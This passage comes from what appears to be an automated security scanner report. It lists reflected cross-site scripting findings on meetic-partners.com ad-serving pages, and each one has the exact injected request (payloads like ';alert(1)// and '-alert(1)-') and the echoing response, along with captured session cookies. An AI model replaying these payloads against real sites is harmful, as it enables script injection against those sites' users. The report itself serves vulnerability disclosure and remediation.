Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:58:05 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ac38b';alert(1)//2aea9aa7199http://www.meetic-partners.com/diff/58/673819/go141.asp?673819%3B97831%3B6525761750539601382%3B392249101%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.175. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;517804283;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/673819/show27.asp

Issue detail

The value of the 673819;97831;6525761750539601382;517804283;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9689'%3balert(1)//10e068cb7a5 was submitted in the 673819;97831;6525761750539601382;517804283;M;systemtarget parameter. This input was echoed as f9689';alert(1)//10e068cb7a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/673819/show27.asp?673819;97831;6525761750539601382;517804283;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B;smartclicktrack=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=f9689'%3balert(1)//10e068cb7a5 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=2066221226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:57:39 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=f9689';alert(1)//10e068cb7a5http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B517804283%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.176. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;877134046;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/673819/show27.asp

Issue detail

The value of the 673819;97831;6525761750539601382;877134046;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc8a8'%3balert(1)//420a2dc5e99 was submitted in the 673819;97831;6525761750539601382;877134046;M;systemtarget parameter. This input was echoed as bc8a8';alert(1)//420a2dc5e99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/673819/show27.asp?673819;97831;6525761750539601382;877134046;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920;smartclicktrack=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=bc8a8'%3balert(1)//420a2dc5e99 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:57:51 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=bc8a8';alert(1)//420a2dc5e99http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.177. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/673819/show27.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d307'%3balert(1)//4f318aba3f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d307';alert(1)//4f318aba3f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/673819/show27.asp?673819;97831;6525761750539601382;517804283;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B;smartclicktrack=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&2d307'%3balert(1)//4f318aba3f2=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=2066221226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:57:40 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=&2d307';alert(1)//4f318aba3f2=1http://www.meetic-partners.com/diff/58/673819/go141.asp?673819%3B97831%3B6525761750539601382%3B517804283%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B
...[SNIP]...

2.178. http://www.meetic-partners.com/a/diff/58/712921/show27.asp [712921;97831;6525761750539601382;512842640;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/712921/show27.asp

Issue detail

The value of the 712921;97831;6525761750539601382;512842640;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 807e5'%3balert(1)//5a3c5d05240 was submitted in the 712921;97831;6525761750539601382;512842640;M;systemtarget parameter. This input was echoed as 807e5';alert(1)//5a3c5d05240 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/712921/show27.asp?712921;97831;6525761750539601382;512842640;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920;smartclicktrack=http://clk.atdmt.com/go/279209217/direct;wi.300;hi.250;01;ai.190623324.161912770;ct.1/01?href=807e5'%3balert(1)//5a3c5d05240 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRB&cb=557465619
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382; ASPSESSIONIDCQACTRDS=OGMPNNIALOCKKOONLHAJCLHK

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 13:03:54 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/279209217/direct;wi.300;hi.250;01;ai.190623324.161912770;ct.1/01?href=807e5';alert(1)//5a3c5d05240http://www.meetic-partners.com/diff/58/712921/go126.asp?712921%3B97831%3B6525761750539601382%3B512842640%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.179. http://www.meetic-partners.com/a/diff/58/712921/show27.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/712921/show27.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54e29'%3balert(1)//0a8e37c0325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54e29';alert(1)//0a8e37c0325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/712921/show27.asp?712921;97831;6525761750539601382;512842640;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920;smartclicktrack=http://clk.atdmt.com/go/279209217/direct;wi.300;hi.250;01;ai.190623324.161912770;ct.1/01?href=&54e29'%3balert(1)//0a8e37c0325=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UKSPRB&cb=557465619
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382; ASPSESSIONIDCQACTRDS=OGMPNNIALOCKKOONLHAJCLHK

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 13:03:54 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/279209217/direct;wi.300;hi.250;01;ai.190623324.161912770;ct.1/01?href=&54e29';alert(1)//0a8e37c0325=1http://www.meetic-partners.com/diff/58/712921/go126.asp?712921%3B97831%3B6525761750539601382%3B512842640%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B
...[SNIP]...

2.180. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2b0e'-alert(1)-'20c938f2fb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]d2b0e'-alert(1)-'20c938f2fb/no?[countgo] HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:38:41 GMT
Content-Length: 584


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;97831;6191896266605361904;[timestamp]d2b0e'-alert(1)-'20c938f2fb;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B';
docume
...[SNIP]...

2.181. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [[countgo] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no

Issue detail

The value of the [countgo] request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d69'-alert(1)-'bcda5d97f29 was submitted in the [countgo] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no?[countgo]f2d69'-alert(1)-'bcda5d97f29 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:38:20 GMT
Content-Length: 611


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;
...[SNIP]...
%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B;smartclicktrack=[countgo]f2d69'-alert(1)-'bcda5d97f29';
document.write('<scr'+'ipt language="Javascr'+'ipt" src="'+sas_iframe+'">
...[SNIP]...

2.182. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d4e6'-alert(1)-'76bbbc117a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no?[countgo]&2d4e6'-alert(1)-'76bbbc117a2=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:38:31 GMT
Content-Length: 614


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;
...[SNIP]...
24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B;smartclicktrack=[countgo]&2d4e6'-alert(1)-'76bbbc117a2=1';
document.write('<scr'+'ipt language="Javascr'+'ipt" src="'+sas_iframe+'">
...[SNIP]...

2.183. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff0a7'-alert(1)-'280b8200956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/97831ff0a7'-alert(1)-'280b8200956/673819/MSN_uk.meeticcorp/300x250/247433133/no?http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href= HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; pdomid=13; pid=6525761750539601382; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:59:22 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831ff0a7'-alert(1)-'280b8200956%3B6525761750539601382%3B247433133%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3
...[SNIP]...

2.184. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no

